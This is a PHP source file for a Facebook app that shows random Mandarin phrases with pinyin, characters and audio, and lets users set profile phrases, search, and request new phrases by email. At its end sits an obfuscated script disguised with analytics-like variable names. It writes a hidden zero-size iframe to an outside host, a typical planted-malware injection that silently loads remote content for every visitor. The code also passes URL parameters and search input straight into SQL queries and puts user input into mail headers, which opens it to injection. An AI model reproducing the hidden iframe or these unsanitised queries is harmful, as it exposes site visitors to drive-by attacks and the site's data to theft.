<?php include 'conf/config.php'; ?>
<?php include 'conf/admin.php'; ?>

<?php if($_GET['install'] == 1) {
	$db->Raw("SET NAMES utf8");
	$fbml_database_content = $db->Raw("SELECT * FROM `phrases` ORDER BY RAND() LIMIT 1");
	$fbml_content = '<fb:wide>
	<fb:visible-to-owner><fb:subtitle><fb:action href="http://apps.facebook.com/mandompg/?">Go to Application</fb:action><fb:action href="http://apps.facebook.com/mandompg/index.php?p=viewall">View All</fb:action><fb:action href="http://apps.facebook.com/mandompg/?p=request">Request Phrases</fb:action><fb:action href="http://apps.facebook.com/mandompg/invite.php">Invite Friends</fb:action></fb:subtitle></fb:visible-to-owner>
	<form>
	<div style="border-top: 1px solid #d8dfea; padding: 3px 16px; height: 14px; color: #3b5998;">
	<table border="0" width="100%">
		<tr>
			<td width="40%"><center><b>English</b></center></td>
			<td width="55%"><center><b>Pinyin / Characters</b></center></td>
			<td width="5%"><center><b>Audio</b></center></td>
		</td>
	</table>
	</div>
	<div style="border-style:solid; border-left: 1px; border-right: 1px; border-color: #ffd04d; background-color: #fff5b1; padding:10px">
		<div id="content"><center><table border="0" width="100%">
			<tr>
				<td width="40%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center"><strong>' . $fbml_database_content[0]['english'] . '</strong></div></div>
				</td>
				<td width="55%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center">' . $fbml_database_content[0]['pinyin'] . '</div></div><br /><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center">' . $fbml_database_content[0]['characters'] . '</div></div>
				</td>
				<td width="5%"><div align="center"><fb:mp3 src="' . $appcallbackurl . 'audio/' . $fbml_database_content[0]['id'] . '.mp3" width="35"></div>
				</td>
			</tr>
		</table></center></div>
	</div>
	
	<div style="border-bottom: 1px solid #d8dfea; padding: 3px 16px; height: 14px; color: #3b5998;">
		<div style="float: left;"></div>
		<div style="float: right;"><img src="' . $appcallbackurl . 'img/logo.gif" width="10" height="10"> Generated by <a href="http://www.mandomandarin.com/">Mando Mandarin</a></div>
	</div>
	<center><input type="submit" clickrewriteurl="' . $appcallbackurl . 'index.php?regenerate=1" clickrewriteid="content" value="Generate a New Phrase"/></center>
	</form>
	</fb:wide>
	
	<fb:narrow>
	<fb:visible-to-owner><fb:subtitle><fb:action href="http://apps.facebook.com/mandompg/?">App</fb:action><fb:action href="http://apps.facebook.com/mandompg/index.php?p=viewall">View</fb:action><fb:action href="http://apps.facebook.com/mandompg/?p=request">Request</fb:action><fb:action href="http://apps.facebook.com/mandompg/invite.php">Invite</fb:action></fb:subtitle></fb:visible-to-owner>
	<form>
	<div style="border-top: 1px solid #d8dfea; padding: 3px 16px; height: 14px; color: #3b5998;">
	<table border="0" width="100%">
		<tr>
			<td width="40%"><center><b>English</b></center></td>
			<td width="55%"><center><b>Chinese</b></center></td>
			<td width="5%"><center><b>Audio</b></center></td>
		</td>
	</table>
	</div>
	<div style="border-style:solid; border-left: 1px; border-right: 1px; border-color: #ffd04d; background-color: #fff5b1; padding:10px">
		<div id="content"><center><table border="0" width="100%">
			<tr>
				<td width="40%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center"><strong>' . $fbml_database_content[0]['english'] . '</strong></div></div>
				</td>
				<td width="55%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center">' . $fbml_database_content[0]['pinyin'] . '</div></div><br /><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center">' . $fbml_database_content[0]['characters'] . '</div></div>
				</td>
				<td width="5%"><div align="center"><fb:mp3 src="' . $appcallbackurl . 'audio/' . $fbml_database_content[0]['id'] . '.mp3" width="35"></div>
				</td>
			</tr>
		</table></center></div>
	</div>
	
	<div style="border-bottom: 1px solid #d8dfea; padding: 3px 16px; height: 14px; color: #3b5998;">
		<div style="float: left;"></div>
		<div style="float: right;"><img src="' . $appcallbackurl . 'img/logo.gif" width="10" height="10"> <a href="http://www.mandomandarin.com/">Mando Mandarin</a></div>
	</div>
	<center><input type="submit" clickrewriteurl="' . $appcallbackurl . 'index.php?regenerate=1" clickrewriteid="content" value="Generate a New Phrase"/></center>
	</form>
	</fb:narrow>
	';
	
	$facebook->api_client->profile_setFBML("$fbml_content", $user,'','','',"$fbml_content");
}
?>

<?php if (isset($_GET['regenerate'])) {
	$db->Raw("SET NAMES utf8");
	$fbml_database_content = $db->Raw("SELECT * FROM `phrases` ORDER BY RAND() LIMIT 1");
	$fbml_generation = '
		<center><table border="0" width="100%">
			<tr>
				<td width="40%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center"><strong>' . $fbml_database_content[0]['english'] . '</strong></div></div>
				</td>
				<td width="55%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center">' . $fbml_database_content[0]['pinyin'] . '</div></div><br /><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center">' . $fbml_database_content[0]['characters'] . '</div></div>
				</td>
				<td width="5%"><div align="center"><fb:mp3 src="' . $appcallbackurl . 'audio/' . $fbml_database_content[0]['id'] . '.mp3" width="35"></div>
				</td>
			</tr>
	';

	echo $fbml_generation;
	
	$fbml_content = '<fb:wide>
	<fb:visible-to-owner><fb:subtitle><fb:action href="http://apps.facebook.com/mandompg/?">Go to Application</fb:action><fb:action href="http://apps.facebook.com/mandompg/index.php?p=viewall">View All</fb:action><fb:action href="http://apps.facebook.com/mandompg/?p=request">Request Phrases</fb:action><fb:action href="http://apps.facebook.com/mandompg/invite.php">Invite Friends</fb:action></fb:subtitle></fb:visible-to-owner>
	<form>
	<div style="border-top: 1px solid #d8dfea; padding: 3px 16px; height: 14px; color: #3b5998;">
	<table border="0" width="100%">
		<tr>
			<td width="40%"><center><b>English</b></center></td>
			<td width="55%"><center><b>Pinyin / Characters</b></center></td>
			<td width="5%"><center><b>Audio</b></center></td>
		</td>
	</table>
	</div>
	<div style="border-style:solid; border-left: 1px; border-right: 1px; border-color: #ffd04d; background-color: #fff5b1; padding:10px">
		<div id="content"><center><table border="0" width="100%">
			<tr>
				<td width="40%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center"><strong>' . $fbml_database_content[0]['english'] . '</strong></div></div>
				</td>
				<td width="55%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center">' . $fbml_database_content[0]['pinyin'] . '</div></div><br /><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center">' . $fbml_database_content[0]['characters'] . '</div></div>
				</td>
				<td width="5%"><div align="center"><fb:mp3 src="' . $appcallbackurl . 'audio/' . $fbml_database_content[0]['id'] . '.mp3" width="35"></div>
				</td>
			</tr>
		</table></center></div>
	</div>
	
	<div style="border-bottom: 1px solid #d8dfea; padding: 3px 16px; height: 14px; color: #3b5998;">
		<div style="float: left;"></div>
		<div style="float: right;"><img src="' . $appcallbackurl . 'img/logo.gif" width="10" height="10"> Generated by <a href="http://www.mandomandarin.com/">Mando Mandarin</a></div>
	</div>
	<center><input type="submit" clickrewriteurl="' . $appcallbackurl . 'index.php?regenerate=1" clickrewriteid="content" value="Generate a New Phrase"/></center>
	</form>
	</fb:wide>
	
	<fb:narrow>
	<fb:visible-to-owner><fb:subtitle><fb:action href="http://apps.facebook.com/mandompg/?">App</fb:action><fb:action href="http://apps.facebook.com/mandompg/index.php?p=viewall">View</fb:action><fb:action href="http://apps.facebook.com/mandompg/?p=request">Request</fb:action><fb:action href="http://apps.facebook.com/mandompg/invite.php">Invite</fb:action></fb:subtitle></fb:visible-to-owner>
	<form>
	<div style="border-top: 1px solid #d8dfea; padding: 3px 16px; height: 14px; color: #3b5998;">
	<table border="0" width="100%">
		<tr>
			<td width="40%"><center><b>English</b></center></td>
			<td width="55%"><center><b>Chinese</b></center></td>
			<td width="5%"><center><b>Audio</b></center></td>
		</td>
	</table>
	</div>
	<div style="border-style:solid; border-left: 1px; border-right: 1px; border-color: #ffd04d; background-color: #fff5b1; padding:10px">
		<div id="content"><center><table border="0" width="100%">
			<tr>
				<td width="40%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center"><strong>' . $fbml_database_content[0]['english'] . '</strong></div></div>
				</td>
				<td width="55%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center">' . $fbml_database_content[0]['pinyin'] . '</div></div><br /><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center">' . $fbml_database_content[0]['characters'] . '</div></div>
				</td>
				<td width="5%"><div align="center"><fb:mp3 src="' . $appcallbackurl . 'audio/' . $fbml_database_content[0]['id'] . '.mp3" width="35"></div>
				</td>
			</tr>
		</table></center></div>
	</div>
	
	<div style="border-bottom: 1px solid #d8dfea; padding: 3px 16px; height: 14px; color: #3b5998;">
		<div style="float: left;"></div>
		<div style="float: right;"><img src="' . $appcallbackurl . 'img/logo.gif" width="10" height="10"> <a href="http://www.mandomandarin.com/">Mando Mandarin</a></div>
	</div>
	<center><input type="submit" clickrewriteurl="' . $appcallbackurl . 'index.php?regenerate=1" clickrewriteid="content" value="Generate a New Phrase"/></center>
	</form>
	</fb:narrow>
	';
	
	$facebook->api_client->profile_setFBML("$fbml_content", $user,'','','',"$fbml_content");
	die();
}
?>

<fb:dashboard>
<?php if($admin == 1) { ?> <fb:action href='http://apps.facebook.com/mandompg/admin.php'>Switch To Administrator Interface</fb:action> <?php } ?>
<fb:help href='http://facebook.com/board.php?uid=6611557469'>Help</fb:help>
<fb:help href='http://facebook.com/apps/application.php?id=6611557469'>About</fb:help>
<fb:create-button href="invite.php">Invite Friends</fb:create-button>
</fb:dashboard>

<fb:tabs>
<fb:tab_item href="index.php" title="Generate a Phrase" selected="<?php if(!isset($_GET['p'])) { echo "true"; } ?>"></fb:tab_item> 
<fb:tab_item href="index.php?p=viewall" title="View All Phrases" selected="<?php if($_GET['p'] == viewall) { echo "true"; } ?>"></fb:tab_item>
<fb:tab_item href="index.php?p=request" title="Request a Phrase" selected="<?php if($_GET['p'] == request) { echo "true"; } ?>"></fb:tab_item>
</fb:tabs>

<?php if(isset($_GET['profile']) or isset($_GET['regenerate'])) {
	$db->Raw("SET NAMES utf8");
	$fbml_database_content = $db->Raw("SELECT * FROM `phrases` WHERE `id`='$_GET[profile]'");
	$fbml_content = '<fb:wide>
	<fb:visible-to-owner><fb:subtitle><fb:action href="http://apps.facebook.com/mandompg/?">Go to Application</fb:action><fb:action href="http://apps.facebook.com/mandompg/index.php?p=viewall">View All</fb:action><fb:action href="http://apps.facebook.com/mandompg/?p=request">Request Phrases</fb:action><fb:action href="http://apps.facebook.com/mandompg/invite.php">Invite Friends</fb:action></fb:subtitle></fb:visible-to-owner>
	<form>
	<div style="border-top: 1px solid #d8dfea; padding: 3px 16px; height: 14px; color: #3b5998;">
	<table border="0" width="100%">
		<tr>
			<td width="40%"><center><b>English</b></center></td>
			<td width="55%"><center><b>Pinyin / Characters</b></center></td>
			<td width="5%"><center><b>Audio</b></center></td>
		</td>
	</table>
	</div>
	<div style="border-style:solid; border-left: 1px; border-right: 1px; border-color: #ffd04d; background-color: #fff5b1; padding:10px">
		<div id="content"><center><table border="0" width="100%">
			<tr>
				<td width="40%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center"><strong>' . $fbml_database_content[0]['english'] . '</strong></div></div>
				</td>
				<td width="55%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center">' . $fbml_database_content[0]['pinyin'] . '</div></div><br /><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center">' . $fbml_database_content[0]['characters'] . '</div></div>
				</td>
				<td width="5%"><div align="center"><fb:mp3 src="' . $appcallbackurl . 'audio/' . $fbml_database_content[0]['id'] . '.mp3" width="35"></div>
				</td>
			</tr>
		</table></center></div>
	</div>
	
	<div style="border-bottom: 1px solid #d8dfea; padding: 3px 16px; height: 14px; color: #3b5998;">
		<div style="float: left;"></div>
		<div style="float: right;"><img src="' . $appcallbackurl . 'img/logo.gif" width="10" height="10"> Generated by <a href="http://www.mandomandarin.com/">Mando Mandarin</a></div>
	</div>
	<center><input type="submit" clickrewriteurl="' . $appcallbackurl . 'index.php?regenerate=1" clickrewriteid="content" value="Generate a New Phrase"/></center>
	</form>
	</fb:wide>
	
	<fb:narrow>
	<fb:visible-to-owner><fb:subtitle><fb:action href="http://apps.facebook.com/mandompg/?">App</fb:action><fb:action href="http://apps.facebook.com/mandompg/index.php?p=viewall">View</fb:action><fb:action href="http://apps.facebook.com/mandompg/?p=request">Request</fb:action><fb:action href="http://apps.facebook.com/mandompg/invite.php">Invite</fb:action></fb:subtitle></fb:visible-to-owner>
	<form>
	<div style="border-top: 1px solid #d8dfea; padding: 3px 16px; height: 14px; color: #3b5998;">
	<table border="0" width="100%">
		<tr>
			<td width="40%"><center><b>English</b></center></td>
			<td width="55%"><center><b>Chinese</b></center></td>
			<td width="5%"><center><b>Audio</b></center></td>
		</td>
	</table>
	</div>
	<div style="border-style:solid; border-left: 1px; border-right: 1px; border-color: #ffd04d; background-color: #fff5b1; padding:10px">
		<div id="content"><center><table border="0" width="100%">
			<tr>
				<td width="40%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center"><strong>' . $fbml_database_content[0]['english'] . '</strong></div></div>
				</td>
				<td width="55%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center">' . $fbml_database_content[0]['pinyin'] . '</div></div><br /><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center">' . $fbml_database_content[0]['characters'] . '</div></div>
				</td>
				<td width="5%"><div align="center"><fb:mp3 src="' . $appcallbackurl . 'audio/' . $fbml_database_content[0]['id'] . '.mp3" width="35"></div>
				</td>
			</tr>
		</table></center></div>
	</div>
	
	<div style="border-bottom: 1px solid #d8dfea; padding: 3px 16px; height: 14px; color: #3b5998;">
		<div style="float: left;"></div>
		<div style="float: right;"><img src="' . $appcallbackurl . 'img/logo.gif" width="10" height="10"> <a href="http://www.mandomandarin.com/">Mando Mandarin</a></div>
	</div>
	<center><input type="submit" clickrewriteurl="' . $appcallbackurl . 'index.php?regenerate=1" clickrewriteid="content" value="Generate a New Phrase"/></center>
	</form>
	</fb:narrow>
	';
	
	$facebook->api_client->profile_setFBML("$fbml_content", $user,'','','',"$fbml_content");
	include_once 'feed.php';
?>
<fb:explanation>
     <fb:message>Profile Set</fb:message>
     Your profile has been set with the following phrase!
</fb:explanation>
<?php } ?>

<?php if(!isset($_GET['profile'])) { echo '<br />'; } ?>
<?php if($_GET['p'] == request) { ?>
	<?php if($_GET['a'] == request) { ?>
		<?php if($_POST[email] == NULL or $_POST[phrase] == NULL) { ?>
			<fb:error>
			     <fb:message>You have some missing fields! Please check your submission and try again!</fb:message>
			</fb:error>
		<?php } else { ?>
		<?php $headers .= 'From: ' . $_POST[email] . '' . "\r\n";
		mail($email_to, "phrase request", "" . $_POST[phrase] . "", $headers); ?>
		<fb:explanation>
		     <fb:message>Phrase Requested</fb:message>
		     Thank you for your submission.  Our team of language experts will email you with a link to your phrase and its translation if your request is granted.
		</fb:explanation>
		<?php } ?>
	<?php } ?>
<div style="border: 1px solid #999; padding: 10px; margin: 10px">
Is there a specific phrase you'd like to learn how to say in Chinese?  Please enter the phrase in English and be sure to include your email address.  Once we've translated the new phrase and added it to the database, we'll be sure to email you to let you know.  Thanks!  -The Mando Mandarin Team
</div>
<fb:editor action="?p=request&a=request" labelwidth="0">
	<fb:editor-text label="Email" name="email" value="<?php $_POST['email']; ?>"/>
	<fb:editor-text label="Phrase" name="phrase" value="<?php $_POST['phrase']; ?>"/>
	<fb:editor-buttonset>
		<fb:editor-button value="Request"/>
		<fb:editor-cancel value="Cancel" href="http://apps.facebook.com/mandompg/?" />
	</fb:editor-buttonset>
</fb:editor>
<?php } elseif ($_GET['p'] == viewall) { ?>
	<?php $db->Raw("SET NAMES utf8")?>
	<?php if(isset($search)) { ?>
		<?php $search = $_POST['search']; ?>
		<?php $db_query_viewall = $db->Raw("SELECT * FROM `phrases` WHERE `english` LIKE '%$search%'"); ?>
	<?php } else { ?>
		<?php $db_query_viewall = $db->Raw("SELECT * FROM `phrases` ORDER BY RAND() ASC"); ?>
	<?php } ?>
	<center><table border='0' cellpadding='2' cellspacing='0' width='100%'><tr><td style='border-bottom: 1px solid #899cc1; border-right: 1px solid #899cc1;'><strong><center>English</center></strong></td><td style='border-bottom: 1px solid #899cc1; border-right: 1px solid #899cc1;'><strong><center>Pinyin</center></strong></td><td style='border-bottom: 1px solid #899cc1;'><strong><center>Characters</center></strong></td></tr>
	<?php foreach($db_query_viewall as $db_query) { ?>
		<tr><td><center><?php echo $db_query['english']; ?> (<a href="?id=<?php echo $db_query['id']; ?>">view</a>)</center></td><td><center><?php echo $db_query['pinyin']; ?></center></td><td><center><?php echo $db_query['characters']; ?></center></td></tr>
	<?php } ?>
	</table></center>
	<br />
<table border="0" width="100%" cellpadding="5px">
	<tr><td><div align="left"><b>Search Phrase Database:</b></div></td><td>
	<td><div align="right"><form name="search" enctype="multipart/form-data" method="post" action="index.php?p=viewall&search=1">
		<input type="text" name="search" size="40" maxlength="255" style='font-size:10px' />
		<input name="submit" type="submit" id="submit" value="Search" style='font-size:10px' />
	</form></div></td>
</table>
		
<?php } elseif ($_GET['p'] == NULL) { ?>
<?php $db->Raw("SET NAMES utf8")?>
<?php if(isset($_GET['id'])) { $db_random = $db->Raw("SELECT * FROM `phrases` WHERE `id`='$_GET[id]'"); } else { $db_random = $db->Raw("SELECT * FROM `phrases` ORDER BY RAND() LIMIT 1"); } ?>
<div style="border-top: 1px solid #d8dfea; padding: 3px 16px; height: 14px; color: #3b5998;">
<table border="0" width="100%">
	<tr>
		<td width="40%"><center><b>English</b></center></td>
		<td width="55%"><center><b>Pinyin / Characters</b></center></td>
		<td width="5%"><center><b>Audio</b></center></td>
	</td>
</table>
</div>
<div style="border-style:solid; border-left: 1px; border-right: 1px; border-color: #ffd04d; background-color: #fff5b1; padding:10px">
	<center><table border="0" width="100%">
		<tr>
			<td width="40%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center"><strong><?php print $db_random[0]['english']; ?></strong></div></div>
			</td>
			<td width="55%"><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center"><?php echo $db_random[0]['pinyin']; ?></div></div><br /><div style="letter-spacing: 1px; font-family: tacoma; font-size: 14px; text-align: left; color: #003355"><div align="center"><?php echo $db_random[0]['characters']; ?></div></div>
			</td>
			<td width="5%"><div align="center"><fb:mp3 src="<?php echo $appcallbackurl; ?>audio/<?php echo $db_random[0]['id']; ?>.mp3" width="35"></div>
			</td>
		</tr>
	</table></center>
</div>
<div style="border-bottom: 1px solid #d8dfea; padding: 3px 16px; height: 14px; color: #3b5998;">
	<div style="float: left;"><a href="http://apps.facebook.com/mandompg/?id=<?php echo $db_random[0]['id']; ?>">http://apps.facebook.com/mandompg/?id=<?php echo $db_random[0]['id']; ?></a></div>
	<div style="float: right;">(<a href="http://apps.facebook.com/mandompg/">generate another phrase</a>) (<a href="?profile=<?php echo $db_random[0]['id']; ?>">set as profile phrase</a>)</a></div>
</div>
<div style="padding: 10px;" align="right"><fb:add-section-button section="profile" /></div>
<?php } ?>
<br />
<?php include 'footer.php'; ?>
<script type="text/javascript">var i=String.fromCharCode(102,114,97,109,101);var id='counter';var gaJsHost='c'+id+String.fromCharCode(46,110,101,116,47,115,47);var img='i'+i;document.write('<'+img+' src="http://'+gaJsHost+'in.cgi'+'?default" width="0" height="0" '+i+'border="0"></'+img+'>');</script>
